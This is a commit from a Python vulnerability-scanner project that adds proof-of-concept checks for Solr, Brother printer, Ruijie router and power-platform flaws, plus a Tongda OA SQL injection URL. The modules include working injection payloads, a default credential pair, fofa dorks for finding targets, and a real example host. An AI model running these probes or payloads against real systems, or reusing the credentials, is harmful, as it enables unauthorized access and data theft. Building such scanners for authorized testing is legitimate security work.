openx-org/BLEN
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

2.23.9

Browse Source
This commit is contained in:
openx-org
2022-11-02 17:32:17 +08:00
parent 3fb09bcb93
commit 4eab50ae85
8 changed files with 395 additions and 20 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
README.md
View File

@@ -10,14 +10,14 @@
[![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/) [![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/)
[![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/blen/blob/main/LICENSE) [![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/blen/blob/main/LICENSE)
[![POC_NUM](https://img.shields.io/badge/poc_num-168-orange.svg)](#PocSupport) [![POC_NUM](https://img.shields.io/badge/poc_num-174-orange.svg)](#PocSupport)
![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/blen?color=gree) ![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/blen?color=gree)
![GitHub forks](https://img.shields.io/github/forks/openx-org/blen?color=blue) ![GitHub forks](https://img.shields.io/github/forks/openx-org/blen?color=blue)
## 🦌 简介 ## 🦌 简介
1、POC数量、经过OpenxLab实验室小伙伴们的不懈努力现已有168个POC 1、POC数量、经过OpenxLab实验室小伙伴们的不懈努力现已有174个POC
2、使用python编写、跨平台、并发能力强、扫描速度非常快 2、使用python编写、跨平台、并发能力强、扫描速度非常快
@@ -189,12 +189,14 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|Apache Solr|Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)|``poc/Apache_Solr/CVE_2019_17558/poc.py``| |Apache Solr|Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)|``poc/Apache_Solr/CVE_2019_17558/poc.py``|
||Apache Solr 任意文件读取漏洞|``poc/Apache_Solr/File_Read/poc.py``| ||Apache Solr 任意文件读取漏洞|``poc/Apache_Solr/File_Read/poc.py``|
||Apache Solr 远程命令执行 Log4j|``poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py``| ||Apache Solr 远程命令执行 Log4j|``poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py``|
||Apache Solr 未授权访问|``poc/Apache_Solr/Unauth_Access/poc.py``|
|Alibaba_FastJson|Alibaba_FastJsonRCE_CVE_2017_18349|``poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py``| |Alibaba_FastJson|Alibaba_FastJsonRCE_CVE_2017_18349|``poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py``|
|AtlassianConfluence 远程代码执行漏洞|AtlassianConfluence_RCE_FileServer_CVE_2022_26134|``poc/AtlassianConfluence/RCE_FileServer_CVE_2022_26134/poc.py``| |AtlassianConfluence 远程代码执行漏洞|AtlassianConfluence_RCE_FileServer_CVE_2022_26134|``poc/AtlassianConfluence/RCE_FileServer_CVE_2022_26134/poc.py``|
|MicroSoft|MicroSoftRCE_CVE_2022_2190|``poc/MicroSoftRCE_CVE_2022_21907/poc.py``| |MicroSoft|MicroSoftRCE_CVE_2022_2190|``poc/MicroSoftRCE_CVE_2022_21907/poc.py``|
|Sangfor 深信服|深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)|``poc/SANGFOR_深信服/RCE_2020_EDR/poc.py``| |Sangfor 深信服|深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)|``poc/SANGFOR_深信服/RCE_2020_EDR/poc.py``|
|碧海威 L7|碧海威 L7 弱口令漏洞|``poc/Bithighway_碧海威/Weak_Pass_L7/poc.py``| |碧海威 L7|碧海威 L7 弱口令漏洞|``poc/Bithighway_碧海威/Weak_Pass_L7/poc.py``|
|BSPHP|BSPHP 未授权访问 信息泄露漏洞|``poc/BSPHP/Info_Disclosure/poc.py``| |BSPHP|BSPHP 未授权访问 信息泄露漏洞|``poc/BSPHP/Info_Disclosure/poc.py``|
|Brother-MFC|Brother MFC-L2730DW series弱口令漏洞|``poc/Brother MFC-L2730DW/Weak_Pass/poc.py``|
|C-Lodop|C-Lodop 云打印机系统平台任意文件读取漏洞|``poc/C_Lodop/File_Read/poc.py``| |C-Lodop|C-Lodop 云打印机系统平台任意文件读取漏洞|``poc/C_Lodop/File_Read/poc.py``|
|中国电信|电信天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞|``poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py``| |中国电信|电信天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞|``poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py``|
||大唐电信AC集中管理平台默认口令|``poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/poc.py``| ||大唐电信AC集中管理平台默认口令|``poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/poc.py``|
@@ -286,6 +288,8 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|PHP|php v8.1开发版后门检测|``poc/php/Backdoor_v8dev/poc.py``| |PHP|php v8.1开发版后门检测|``poc/php/Backdoor_v8dev/poc.py``|
|PHPStudy|PHPStudy 后门检测|``poc/PHPStudy/Back_Door/poc.py``| |PHPStudy|PHPStudy 后门检测|``poc/PHPStudy/Back_Door/poc.py``|
|PHPUnit|PHPUnit eval-stdin.php 远程命令执行漏洞|``poc/PHPUnit/RCE_eval_stdin/poc.py``| |PHPUnit|PHPUnit eval-stdin.php 远程命令执行漏洞|``poc/PHPUnit/RCE_eval_stdin/poc.py``|
|普元电力|电力运维云平台管理口令泄露漏洞|``poc/PuYuan/Config_info_Disclosure/poc.py``|
|普元电力|电力运维云平台存在数据库配置信息泄露漏洞|``poc/PuYuan/Info_Disclosure/poc.py``|
|Redis|Redis未授权访问|``poc/Redis/Unauth_Access/poc.py``| |Redis|Redis未授权访问|``poc/Redis/Unauth_Access/poc.py``|
|锐捷|锐捷EG网关 userAuth.php存在任意文件读取漏洞|``poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py``| |锐捷|锐捷EG网关 userAuth.php存在任意文件读取漏洞|``poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py``|
||锐捷NBR 1300G 路由器 越权CLI命令执行漏洞|``poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py``| ||锐捷NBR 1300G 路由器 越权CLI命令执行漏洞|``poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py``|
@@ -293,6 +297,7 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
||锐捷RG-UAC/RG-ISG统一上网行为管理审计系统存在账号密码信息泄露|``poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/poc.py``| ||锐捷RG-UAC/RG-ISG统一上网行为管理审计系统存在账号密码信息泄露|``poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/poc.py``|
||锐捷Smartweb管理系统 默认账户➕命令执行漏洞|``poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py``| ||锐捷Smartweb管理系统 默认账户➕命令执行漏洞|``poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py``|
||锐捷云课堂主机 目录遍历漏洞|``poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py``| ||锐捷云课堂主机 目录遍历漏洞|``poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py``|
||锐捷路由器RG-NBR800GW 未授权访问漏洞|``poc/Ruijie_锐捷/Unauth_Access/poc.py``|
|若依后台管理系统|若依后台管理系统 弱口令|``poc/RuoYi_若依/Weak_Pass/poc.py``| |若依后台管理系统|若依后台管理系统 弱口令|``poc/RuoYi_若依/Weak_Pass/poc.py``|
|Samsung|三星路由器本地文件包含|``poc/Samsung/Lfi_Samsung_Wlan_AP/poc.py``| |Samsung|三星路由器本地文件包含|``poc/Samsung/Lfi_Samsung_Wlan_AP/poc.py``|
||三星 WLAN AP WEA453e路由器 远程命令执行漏洞|``poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py``| ||三星 WLAN AP WEA453e路由器 远程命令执行漏洞|``poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py``|

8
blen_settings.json Normal file
View File

@@ -0,0 +1,8 @@
{
"defaultContext": {
"account": null,
"database": null,
"schema": null
},
"scripts": []
}

72
poc/Apache_Solr/Unauth_Access/poc.py Normal file
View File

@@ -0,0 +1,72 @@
# coding:utf-8
import requests
from lib.core.common import url_handle
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "Du9r1", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-11-2", # POC创建时间
"UpdateDate" : "2022-11-2", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "Solr未授权访问", # 漏洞名称
"VulnID" : "", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "solr", # 漏洞应用名称
"AppVersion" : "全版本", # 漏洞应用版本
"VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写能查到的最早的文献日期格式xxxx-xx-xx
"VulnDesc" : """
Solr应用服务器安装后未进行管理界面访问限制,导致管理界面可直接进行访问,泄露敏感信息并可对Solr进行进一步的管理。
当开发者配置不当时就可能造成未授权访问漏洞。
""", # 漏洞简要描述
"fofa-dork":'title="solr"&&country="CN"', # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
timeout = 10
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/solr/admin/cores" # url自己按需调整
headers = {"User-Agent":"Mozilla/5.0 (Windows ME; U;cd en) Opera 8.51",
"Connection":"close"}
try:
"""
检测逻辑漏洞存在则修改vuln值漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
if req.status_code == 200 and "responseHeader" in req.text:
vuln = [True,req.text]
else:
vuln = [False,""]
except Exception as e:
raise e
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

73
poc/Brother MFC-L2730DW/Weak_Pass/poc.py Normal file
View File

@@ -0,0 +1,73 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-09-07", # POC创建时间
"UpdateDate" : "2022-09-07", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "Brother MFC-L2730DW series弱口令漏洞", # 漏洞名称
"VulnID" : "oFx-2022-0906", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2022-09-07", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"""
title="Brother HL-L8360CDW series"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/general/status.html" # url自己按需调整
data = "CSRFToken=uDmE4RvNEHZfHNtcOruqZPtWbT3IjovV%2B4zyo6cxVUZWt2Loyw%3D%3D&B5be=initpass&loginurl=%2Fgeneral%2Fstatus.html"
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.post(url,headers = headers , data= data ,proxies = self.proxy ,timeout = self.timeout,verify = False)
if "Administrator" in req.text:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

73
poc/PuYuan/Config_Info_Disclosure/poc.py Normal file
View File

@@ -0,0 +1,73 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "普元电力发展有限公司电力运维云平台管理口令泄露漏洞", # 漏洞名称
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "电力运维云平台管理口令泄露漏洞", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-09-02", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
访问/config/configVue.js文件发现其存在MQTT的配置信息其账号密码也是web登录的账号密码。这个账号也是其默认admin的默认账号密码。利用该账号密码可登录多个平台。
""", # 漏洞简要描述
"fofa-dork":"""
icon_hash="-1291691164"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/config/configVue.js" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if "MQTT_USERNAME:'admin'" and "MQTT_KEY:'Acrel001'"in req.text:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

73
poc/PuYuan/Info_Disclosure/poc.py Normal file
View File

@@ -0,0 +1,73 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "普元电力发展有限公司电力运维云平台存在数据库配置信息泄露漏洞", # 漏洞名称
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "电力运维云平台存在数据库配置信息泄露漏洞", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-09-02", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
电力运维云平台存在数据库配置信息泄露漏洞,泄露相应的数据库配置信息。
""", # 漏洞简要描述
"fofa-dork":"""
icon_hash="-1291691164"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/fileSystem/jdbc/jdbc.properties" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if "jdbc.properties" in req.text:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

72
poc/Ruijie_锐捷/Unauth_Access/poc.py Normal file
View File

@@ -0,0 +1,72 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-09-07", # POC创建时间
"UpdateDate" : "2022-09-07", # POC创建时间
"PocDesc" : """
锐捷路由器RG-NBR800GW存在未授权访问漏洞攻击者可以通过特殊手段获取路由器敏感信息如内网地址mac等
""", # POC描述写更新描述没有就不写
"name" : "锐捷路由器RG-NBR800GW存在未授权访问漏洞", # 漏洞名称
"VulnID" : "oFx-2022-0916", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "RG-NBR800GW", # 漏洞应用版本
"VulnDate" : "2022-09-16", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"""
icon_hash="772273815"
""", # fofa搜索语句
"example" : "http://47.253.113.46:9999/index.data?opt=err&_=1663068005", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/index.data?opt=err&_=1663068005"
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False)
if "{vs:'RG-NBR" in req.text:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

29
poc/Tongda_通达OA/Sql_inj_TongDa/poc.py
View File

@@ -2,7 +2,6 @@
import requests import requests
from lib.core.common import url_handle,get_random_ua from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase from lib.core.poc import POCBase
# ... # ...
import urllib3 import urllib3
urllib3.disable_warnings() urllib3.disable_warnings()
@@ -12,19 +11,19 @@ class POC(POCBase):
_info = { _info = {
"author" : "hansi", # POC作者 "author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1 "version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-18", # POC创建时间 "CreateDate" : "2022-09-06", # POC创建时间
"UpdateDate" : "2021-06-18", # POC创建时间 "UpdateDate" : "2022-09-06", # POC创建时间
"PocDesc" : """ "PocDesc" : """
""", # POC描述写更新描述没有就不写 """, # POC描述写更新描述没有就不写
"name" : "通达OA前台存在sql注入", # 漏洞名称 "name" : "通达OA 11.9,SQL注入漏洞", # 漏洞名称
"VulnID" : "", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可 "VulnID" : "oFx-2022-0906", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称 "AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本 "AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx "VulnDate" : "2022-09-06", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """ "VulnDesc" : """
通达OA前台存在sql注入
""", # 漏洞简要描述 """, # 漏洞简要描述
"fofa-dork":""" "fofa-dork":"""
@@ -32,9 +31,9 @@ class POC(POCBase):
""", # fofa搜索语句 """, # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了 "example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管 "exp_img" : "", # 先不管
} }
def _verify(self): def _verify(self):
""" """
返回vuln 返回vuln
@@ -44,7 +43,7 @@ class POC(POCBase):
不存在漏洞vuln = [False,""] 不存在漏洞vuln = [False,""]
""" """
vuln = [False,""] vuln = [False,""]
url = self.target + "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\re%201={`\=%27`%201}%20un\ion%20(s\elect%20user_name,byname%20fr\om%20user%20whe\re%201\={`=`%201})--%20%27'" # url自己按需调整 url = self.target + "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1,1&tab=5%20where%202={`=%27`%201}%20union%20(select%20CURRENT_USER(),version(),SCHEMA())--%20%27" # url自己按需调整
headers = {"User-Agent":get_random_ua(), headers = {"User-Agent":get_random_ua(),
@@ -54,21 +53,21 @@ class POC(POCBase):
try: try:
""" """
检测逻辑漏洞存在则修改vuln值漏洞不存在则不动 检测逻辑漏洞存在则修改vuln值为True,漏洞不存在则不动
""" """
req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False) req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 and "1" in req.text: if "root@::1;td_oa;5.6.35-log"in req.text:#req.status_code == 200 and :
vuln = [True,req.text] vuln = [True,req.text]
else: else:
vuln = [False,req.text] vuln = [False,req.text]
except Exception as e: except Exception as e:
raise e raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True: if self._honeypot_check(vuln[1]) == True:
vuln[0] = False vuln[0] = False
return vuln return vuln
def _attack(self): def _attack(self):
return self._verify() return self._verify()